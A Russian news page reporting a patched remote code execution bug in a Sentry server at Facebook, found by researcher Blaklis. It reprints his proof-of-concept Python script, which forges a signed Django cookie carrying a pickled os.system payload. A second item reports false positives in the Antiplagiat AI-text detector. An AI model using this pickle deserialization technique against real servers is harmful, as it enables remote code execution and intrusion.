Баг на сервере Facebook позволял удаленно запустить вредоносный код

Олег Иванов 28 Августа 2018 - 10:08

...

Баг на сервере Facebook позволял удаленно запустить вредоносный код

Разработчики Facebook исправили серьезный баг, который мог привести к удаленному выполнению кода. Сама уязвимость была обнаружена на одном из серверов интернет-гиганта, о чем сообщил исследователь безопасности Дэниел Ле Галл, также известный под псевдонимом «Blaklis».

Ле Галл, работающий в SCRT Information Security, в пятницу заявил, что ему выплатили $5000 за сообщение о проблеме безопасности.

Суть уязвимости в том, что злоумышленник может выполнить произвольные команды, используя вредоносные файлы cookie.

Несмотря на то, что подобные бреши обычно довольно опасны, эксперт подчеркнул, что с помощью этого бага нельзя было получить пользовательские данные. Разработчики устранили уязвимость в этом месяце, еще до того, как была опубликована информация о ее наличии.

«Blaklis» утверждает, что недостаток был найден на одном из серверов Facebook, где было запущено программное обеспечение для сбора логов Sentry.

«Само приложение было крайне нестабильным, особенно в отношении функции сброса пароля пользователя», — объясняет специалист.

В итоге Ле Галлу удалось найти в логах детали обработки cookie, а также подробности использования приложением протокола Pickle, который может быть уязвим для различного рода манипуляций. Используя все вышеозначенные данные, эксперт мог обработать файлы cookie, которые могли запускать команды на машине.

Исследователь опубликовал PoC-код, который является небольшим файлом cookie:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Следующая главная новость »

Реагирование на инциденты ИБ: что делать, когда всё уже случилось?
Регистрируйтесь!

Яков Шпунт 29 Апреля 2026 - 10:42

Ошибки конфигурации программ Сбои программ Домашние пользователи Государство

Из-за сбоев Антиплагиата студентов не допускают к сдаче работ

Из-за ложноположительных срабатываний системы «Антиплагиат» студентов массово не допускают к сдаче курсовых и дипломных работ. Тексты приходится переписывать по нескольку раз, причём проблемы возникают даже с работами, написанными самостоятельно.

О массовых случаях недопуска студентов сообщает телеграм-канал Baza. По его данным, с такими ситуациями сталкиваются студенты вузов Москвы, Санкт-Петербурга и регионов.

Признаки генерации находят даже в текстах, полностью написанных вручную. Некоторым студентам приходилось переписывать работы до 13 раз, чтобы пройти проверку.

«"Антиплагиат" уже совсем сошёл с ума. Мы проводили эксперименты, в рамках которых моя бывшая одногруппница полностью копировала курсовую с текста ИИ и получала больше 70 баллов. Я же делала всё сама, а в итоге мне поставили 0. На зачёте заставили писать работу заново. Естественно, я всё переписала и защитилась. Оказалось, чтобы обойти "Антиплагиат", нужно писать не свои мысли, а просто использовать те фразы и слова, в которых нельзя было бы распознать ИИ», — поделилась своим опытом в эфире радиостанции «Коммерсантъ FM» студентка РАНХиГС Василиса.

По оценкам источников Hi-Tech Mail, проблема связана с тем, что в 2026 году многие сервисы проверки оригинальности текстов, включая публичные и внутривузовские, получили новые инструменты для выявления материалов, сгенерированных нейросетями. Однако алгоритмы, судя по всему, настроили слишком агрессивно.

«Из-за высокой обеспокоенности проблемой нововведения становятся гораздо более жёсткими. Раньше такого нацеленного блока проверки не было. В основном плагиат находили в заимствованиях или неграмотно оформленном цитировании. Работа усложнилась и у студентов, и у преподавателей. Менять систему вряд ли будут, жаловаться на неё бесполезно. Поэтому тут могут быть вопросы к установленным вузом процентам», — прокомментировала ситуацию «Коммерсантъ FM» профессор Института развития образования Высшей школы экономики Ирина Абанкина.

Дополнительная сложность в том, что академический стиль сам по себе близок к тому, как пишут нейросети. Одна из студенток, столкнувшаяся с ложноположительным срабатыванием, переписала текст в более разговорной манере — и после этого работа прошла проверку. Однако, по её словам, качество текста и его ценность для будущих работодателей от этого снизились.

«Сегодня хорошо написанная работа часто воспринимается так, будто её писал искусственный интеллект. Но это не так. У нас на самом деле есть огромное количество талантливых студентов, которых нужно оправдывать и защищать от обвинений в использовании ИИ. У них должен быть инструмент, чтобы преподаватели и заинтересованные лица знали, что работа написана самостоятельно», — признаёт проблему исполнительный директор компании «Антиплагиат» Евгений Лукьянчиков в комментарии для Hi-Tech Mail.

По информации Baza, студенты массово обращаются в Минобрнауки с просьбой пересмотреть подходы к проверке работ, а также отменить обязательные платные подписки на внутривузовские антиплагиат-сервисы. Многие преподаватели, в свою очередь, предлагают переходить к другим формам промежуточной аттестации, которые позволят объективнее оценивать знания и практические навыки.

Реагирование на инциденты ИБ: что делать, когда всё уже случилось?
Регистрируйтесь!